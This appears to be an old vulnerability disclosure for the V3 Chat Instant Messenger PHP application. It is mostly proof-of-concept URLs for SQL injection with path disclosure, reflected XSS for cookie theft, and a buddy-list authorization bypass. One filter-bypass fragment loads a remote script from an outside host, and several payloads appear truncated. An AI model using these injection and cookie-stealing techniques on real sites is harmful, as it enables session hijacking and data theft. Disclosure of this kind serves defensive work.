V3 Chat Instant Messenger http://www.v3chat.com/ Affected files: /mail/index.php /mail/reply.php is_online.php online.php profile.php profileview.php search.php mycontacts.php expire.php * Editing your profile: - input boxes ------------------------------------------ Mail Vulnerabilities: Full path disclosure via SQL injection on id when reading mail: http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1' Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/v3chat/mail/index.php on line 17 XSS vuln with cookie disclosure: We can bypass V3chats filters by using malformed img tags around out script tags. PoC: http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1"> Replying to mail XSS vulns: http://www.example.com/v3chat/mail/reply.php?&recipientname=Scorpio&mid=62&id=1"> --------------------------------------- Members online XSS vulns with cookie disclosure: http://www.example.com/v3chat/members/is_online.php?membername=demo&action=update&login_id="> Same as above, on online.php: http://www.example.com/messenger/online.php?action=update&membername=luny666&site_id="> Adding members via Online.php Mysql error & full path disclosure: http://www.example.com/messenger/online.php?action=update&membername=' Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/messenger/online.php on line 5 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Online', 'Jun 17, 2006 - 9:55 pm', '1150577732', '')' at line 1 ------------------------------------- Search.php XSS vuln: http://www.example.com/messenger/search.php?action=update&membername=&action=search&site_id="> Adding a member from search.php XSS vuln: http://www.example.com/messenger/search.php?membername=luny666&memberid=287&contact_id=1&contact_name=&site_id=&add=1&s=1&r=0&min_age=16&max_age=100&location=&gender1=&gender2= -------------------------------------- Same as above, this time on profile.php: http://www.example.com/messenger/profile.php?new_reg=1&site_id="> ----------------------------------- Same as above, on Profileview.php now: http://www.example.com/messenger/profileview.php?membername=demo"> ---------------------------------- XSS vuln with cookie disclosure when editing profile: To bypass V3 chats filters we can use this XSS example. Credits to RSnake.Script tags wrapped around a document.write function that writes part of our second script tag. PT SRC="http://youfucktard.com/xss.js"> ------------------------------- Mycontacts.php XSS vulns with user bypass. It seems after you log in as a user youre able to put in any username in membername= and it will navigate you to their buddylist. From there you can add, remove, chat with, etc people on their buddylist. etc. PoC: http://example.com/messenger/mycontacts.php?membername=putausername ------------------------------- Expire.php XSS vuln: http://example.com/messenger/expire.php?cust_name="> ----------------------------- Screenshots: http://www.youfucktard.com/xsp/v3chat1.jpg http://www.youfucktard.com/xsp/v3chat2.jpg http://www.youfucktard.com/xsp/v3chat3.jpg http://www.youfucktard.com/xsp/v3chat4.jpg http://www.youfucktard.com/xsp/v3chat5.jpg http://www.youfucktard.com/xsp/v3chat6.jpg http://www.youfucktard.com/xsp/v3chat7.jpg http://www.youfucktard.com/xsp/v3chat8.jpg http://www.youfucktard.com/xsp/v3chat9.jpg http://www.youfucktard.com/xsp/v3chat10.jpg